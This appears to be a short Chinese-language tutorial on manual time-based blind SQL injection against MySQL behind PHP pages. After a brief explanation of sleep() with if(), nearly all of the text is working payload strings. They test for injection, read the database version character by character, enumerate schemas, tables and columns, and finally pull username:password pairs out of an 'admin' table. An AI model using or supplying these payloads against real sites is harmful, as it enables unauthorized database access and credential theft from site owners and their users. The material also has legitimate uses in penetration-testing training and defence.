mysql+php手工注入-延时注入
延时注入属于盲注的一种,这种注入通过mysql中的 sleep()函数,进行延时
sleep() 通常与 if 一起使用
例如:select if(1=1,sleep(3),0) 意思是 如果1=1,就延时3s,否则为0
延时注入的方法是 先获取数据的长度,再用长度查询内容
判断注入
and sleep(3):如果存在注入,页面会延时3s
获取mysql版本
先判断版本长度,再对每一个字符进行判断
length() 查询长度
substring() 截取字符
ascii() ascii码
id=1 and if(length(version())=6,sleep(3),0)
and if(ascii(substring(version(),1,1))=53,sleep(5),0)
and if(ascii(substring(version(),2,1))=46,sleep(5),0)
and if(ascii(substring(version(),3,1))=53,sleep(5),0)
and if(ascii(substring(version(),4,1))=46,sleep(5),0)
and if(ascii(substring(version(),5,1))=52,sleep(5),0)
and if(ascii(substring(version(),6,1))=54,sleep(5),0)
获取库名
and if(length((select schema_name from information_schema.schemata limit 0,1))=10,sleep(5),0)
and if(ascii(substring((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),0)
获取表名
and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=34,sleep(5),0)
and if(ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=100,sleep(5),0)
获取字段
if(LENGTH((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e))=20,sleep(5),0)
if(ascii(SUBSTRING((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e),1,1))=105,sleep(5),0)
获取数据
if(LENGTH((select GROUP_CONCAT(username,0x3a,password)from admin))=38,sleep(5),5)
if(ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin),1,1))=105,sleep(5),5)